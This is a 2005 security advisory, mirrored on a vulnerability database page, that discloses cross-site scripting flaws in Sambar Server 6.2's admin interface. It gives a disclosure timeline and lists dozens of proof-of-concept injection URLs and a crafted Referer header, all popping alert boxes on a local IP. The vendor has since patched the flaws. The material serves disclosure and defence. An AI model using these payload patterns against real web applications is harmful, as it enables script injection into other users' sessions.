Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

sambarXSS.txt

🗓️ 14 Aug 2005 00:00:00Reported by Jamie FisherType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 41 Views

Security Vulnerability in Sambar Server 6.

Code
`--0-1405209961-1116882149=:65898  
Content-Type: text/plain; charset=iso-8859-1  
Content-Transfer-Encoding: 8bit  
  
  
- Sambar -   
AFFECTED PRODUCTS:  
==================   
Sambar Server 6.2   
http://www.sambar.com/   
  
OVERVIEW:   
=========  
Sambar is an all-in-one and fully functional Web, HTTP, HTTPS, Mail, IRC, Syslog, Proxy and FTP server.  
  
HISTORY:  
========  
17th April 2005 - First discovered  
17th April 2005 - Contacted vendor  
20th April 2005 - Vendor reply  
20th May 2005 - Patch available  
  
DETAILS:  
========  
Multiple XSS found in the administrative interface.  
In some instances Sambar Server version 6.2 does not correctly filter HTML code from user-supplied   
input. A user can input a specially crafted script that when rendered by the application, will cause arbitrary scripting to be executed by the user's browser. The code will originate from the site running the Sambar Server version 6.2 software and will run in the security context of that site.   
  
ISSUE:  
======  
Crafted input of causes the application to output what is known as a Cross Site Script. The script is rendered upon visitation to the affected the page served by the application.  
EXAMPLE:  
========  
Standard XSS within the /search directory:  
==========================================  
1.  
">alert("XSS")&style=fancy&spage=10&query=Folder%name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=10&query=Folder%name  
2.  
%22%27>&style=fancy&spage=10&query=Folder%name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=10&query=Folder%name  
3.  
">alert("XSS")&style=fancy&spage=20&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=20&query=Folder%20name  
4.  
%22%27>&style=fancy&spage=20&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=20&query=Folder%20name  
5.  
">alert("XSS")&style=fancy&spage=30&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=30&query=Folder%20name  
6.  
%22%27>&style=fancy&spage=30&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=30&query=Folder%20name  
7.  
">alert("XSS")&style=fancy&spage=40&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=40&query=Folder%20name  
8.  
%22%27>&style=fancy&spage=40&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=40&query=Folder%20name  
9.  
">alert("XSS")&style=fancy&spage=50&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=50&query=Folder%20name  
10.  
%22%27>&style=fancy&spage=50&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=50&query=Folder%20name  
11.  
">alert("XSS")&style=fancy&spage=60&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=60&query=Folder%20name  
12.  
%22%27>&style=fancy&spage=60&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=60&query=Folder%20name  
Standard XSS within the /session directory:  
===========================================  
1.  
'>alert('XSS')http://192.168.0.5/session/logout?RCredirect=>'><script>alert('XSS')</script>  
2.  
">alert("XSS")http://192.168.0.5/session/logout?RCredirect=>"><script>alert("XSS")</script>  
3.  
%22%27>http://192.168.0.5/session/logout?RCredirect=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>  
HTML XSS within the /search directory:  
======================================  
1.  
"'>&style=fancy&spage=10&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=10&query=Folder%20name  
2.  
"'>&style=fancy&spage=20&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=20&query=Folder%20name  
3.  
"'>&style=fancy&spage=30&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=30&query=Folder%20name  
4.  
"'>http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;  
%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=40&query=Folder%20name  
5.  
"'>&style=fancy&spage=50&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=50&query=Folder%20name  
6.  
"'>&style=fancy&spage=60&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=60&query=Folder%20name  
No chevron '<' '>' XSS within the /search directory:  
====================================================  
1.  
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=10&query=Folder%20name  
2.  
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=20&query=Folder%20name  
3.  
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=30&query=Folder%20name  
4.  
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=40&query=Folder%20name  
5.  
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=50&query=Folder%20name  
6.  
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=60&query=Folder%20name  
Escaping from HTML XSS within the /session directory:  
====================================================  
1.  
alert(%27XSS%27)http://192.168.0.5/session/logout?RCredirect=--><script>alert(%27XSS%27)</script>  
Including XSS within referrer:  
==============================  
1.  
GET /CheckingXssInReferer.html HTTP/1.0  
Cookie: RCuid=SS1-1113767443-uh287LUVlBbVwpESKaZ29/hq0cDSVneAgWlracaqApQ=; RCslb=5; RCrelogin=false  
Host: 192.168.0.5  
Accept: */*  
Accept-Language: en-us  
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)  
Referer: "></a><script>alert('XSS')</script>  
  
SOLUTION:   
=========  
Sambar Server has been contacted and has released patches.   
Note: There were probably a lot more input validation errors but due to a whinning girlfriend work had to be cut short :)  
  
REFERENCE:  
==========  
http://www.sambar.com/security.htm  
http://homepage.hispeed.ch/spamtrap/sambar62p.exe  
  
CREDITS:   
========  
Tod Sambar for understanding the issue and resolving in a timely manner.  
  
This vulnerability was discovered and researched by Jamie Fisher  
mail: contact_jamie_fisher[at]yahoo.co.uk  
  
  
---------------------------------  
Yahoo! Messenger NEW - crystal clear PC to PCcalling worldwide with voicemail  
--0-1405209961-1116882149=:65898  
Content-Type: text/html; charset=iso-8859-1  
Content-Transfer-Encoding: 8bit  
  
<DIV><BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Sambar - </DIV>  
<DIV>AFFECTED PRODUCTS:<BR>================== </DIV>  
<DIV>Sambar Server 6.2 </DIV>  
<DIV><A href="http://www.sambar.com/">http://www.sambar.com/</A> </DIV>  
<DIV><BR>OVERVIEW: <BR>=========</DIV>  
<DIV>Sambar is an all-in-one and fully functional Web, HTTP, HTTPS, Mail, IRC, Syslog, Proxy and FTP server.</DIV>  
<DIV><BR>HISTORY:<BR>========</DIV>  
<DIV>17th April 2005 - First discovered<BR>17th April 2005 - Contacted vendor<BR>20th April 2005 - Vendor reply<BR>20th May 2005 - Patch available</DIV>  
<DIV><BR>DETAILS:<BR>========</DIV>  
<DIV>Multiple XSS found in the administrative interface.</DIV>  
<DIV>In some instances Sambar Server version 6.2 does not correctly filter HTML code from user-supplied <BR>input. A user can input a specially crafted script that when rendered by the application, will cause arbitrary scripting to be executed by the user's browser. The code will originate from the site running the Sambar Server version 6.2 software and will run in the security context of that site. </DIV>  
<DIV><BR>ISSUE:<BR>======</DIV>  
<DIV>Crafted input of causes the application to output what is known as a Cross Site Script.&nbsp; The script is rendered upon visitation to the affected the page served by the application.</DIV>  
<DIV>EXAMPLE:<BR>========</DIV>  
<DIV>Standard XSS within the /search directory:<BR>==========================================</DIV>  
<DIV>1.<BR><A href='http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=10&query=Folder%name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=10&query=Folder%name</A></DIV>  
<DIV>2.<BR><A href="http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=10&query=Folder%name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=10&query=Folder%name</A></DIV>  
<DIV>3.<BR><A href='http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=20&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=20&query=Folder%20name</A></DIV>  
<DIV>4.<BR><A href="http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=20&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=20&query=Folder%20name</A></DIV>  
<DIV>5.<BR><A href='http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=30&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=30&query=Folder%20name</A></DIV>  
<DIV>6.<BR><A href="http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=30&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=30&query=Folder%20name</A></DIV>  
<DIV>7.<BR><A href='http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=40&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=40&query=Folder%20name</A></DIV>  
<DIV>8.<BR><A href="http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=40&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=40&query=Folder%20name</A></DIV>  
<DIV>9.<BR><A href='http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=50&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=50&query=Folder%20name</A></DIV>  
<DIV>10.<BR><A href="http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=50&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=50&query=Folder%20name</A></DIV>  
<DIV>11.<BR><A href='http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=60&query=Folder%20name'>http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=60&query=Folder%20name</A></DIV>  
<DIV>12.<BR><A href="http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=60&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=60&query=Folder%20name</A></DIV>  
<DIV>Standard XSS within the /session directory:<BR>===========================================</DIV>  
<DIV>1.<BR><A href="http://192.168.0.5/session/logout?RCredirect=>'><script>alert('XSS')</script">http://192.168.0.5/session/logout?RCredirect=>'><script>alert('XSS')</script</A>></DIV>  
<DIV>2.<BR><A href='http://192.168.0.5/session/logout?RCredirect=>"><script>alert("XSS")</script'>http://192.168.0.5/session/logout?RCredirect=>"><script>alert("XSS")</script</A>></DIV>  
<DIV>3.<BR><A href="http://192.168.0.5/session/logout?RCredirect=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22">http://192.168.0.5/session/logout?RCredirect=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22</A>></DIV>  
<DIV>HTML XSS within the /search directory:<BR>======================================</DIV>  
<DIV>1.<BR><A href="http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=10&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=10&query=Folder%20name</A></DIV>  
<DIV>2.<BR><A href="http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=20&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=20&query=Folder%20name</A></DIV>  
<DIV>3.<BR><A href="http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=30&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=30&query=Folder%20name</A></DIV>  
<DIV>4.<BR><A href="http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63</A>;<BR>%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=40&query=Folder%20name</DIV>  
<DIV>5.<BR><A href="http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=50&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=50&query=Folder%20name</A></DIV>  
<DIV>6.<BR><A href="http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=60&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=60&query=Folder%20name</A></DIV>  
<DIV>No chevron '<' '>' XSS within the /search directory:<BR>====================================================</DIV>  
<DIV>1.<BR><A href="http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=10&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=10&query=Folder%20name</A></DIV>  
<DIV>2.<BR><A href="http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=20&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=20&query=Folder%20name</A></DIV>  
<DIV>3.<BR><A href="http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=30&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=30&query=Folder%20name</A></DIV>  
<DIV>4.<BR><A href="http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=40&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=40&query=Folder%20name</A></DIV>  
<DIV>5.<BR><A href="http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=50&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=50&query=Folder%20name</A></DIV>  
<DIV>6.<BR><A href="http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=60&query=Folder%20name">http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=60&query=Folder%20name</A></DIV>  
<DIV>Escaping from HTML XSS within the /session directory:<BR>====================================================</DIV>  
<DIV>1.<BR><A href="http://192.168.0.5/session/logout?RCredirect=--><script>alert(%27XSS%27)</script">http://192.168.0.5/session/logout?RCredirect=--><script>alert(%27XSS%27)</script</A>></DIV>  
<DIV>Including XSS within referrer:<BR>==============================</DIV>  
<DIV>1.<BR>GET /CheckingXssInReferer.html HTTP/1.0<BR>Cookie: RCuid=SS1-1113767443-uh287LUVlBbVwpESKaZ29/hq0cDSVneAgWlracaqApQ=; RCslb=5; RCrelogin=false<BR>Host: 192.168.0.5<BR>Accept: */*<BR>Accept-Language: en-us<BR>User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)<BR>Referer: "></a><script>alert('XSS')</script></DIV>  
<DIV><BR>SOLUTION: <BR>=========</DIV>  
<DIV>Sambar Server has been contacted and has released patches. </DIV>  
<DIV>Note: There were probably a lot more input validation errors but due to a whinning girlfriend work had to be cut short :)</DIV>  
<DIV><BR>REFERENCE:<BR>==========</DIV>  
<DIV><A href="http://www.sambar.com/security.htm">http://www.sambar.com/security.htm</A></DIV>  
<DIV><A href="http://homepage.hispeed.ch/spamtrap/sambar62p.exe">http://homepage.hispeed.ch/spamtrap/sambar62p.exe</A></DIV>  
<DIV><BR>CREDITS: <BR>========</DIV>  
<DIV>Tod Sambar for understanding the issue and resolving in a timely manner.</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>This vulnerability was discovered and researched by Jamie Fisher</DIV>  
<DIV>mail: contact_jamie_fisher[at]yahoo.co.uk</DIV><p>  
<hr size=1><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://us.rd.yahoo.com/mail/uk/taglines/default/messenger/*http://uk.messenger.yahoo.com  
">Yahoo! Messenger</a>  
<font color="red">NEW</font> - crystal clear PC to PC  
<a href="http://us.rd.yahoo.com/mail/uk/taglines/default/messenger/*http://uk.beta.messenger.yahoo.com  
">calling worldwide with voicemail  
</a></font>  
--0-1405209961-1116882149=:65898--  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Aug 2005 00:00Current
7.4High risk
Vulners AI Score7.4
xsssambar serverweb serverhttpmailircsyslogproxyftppatchcross site script
41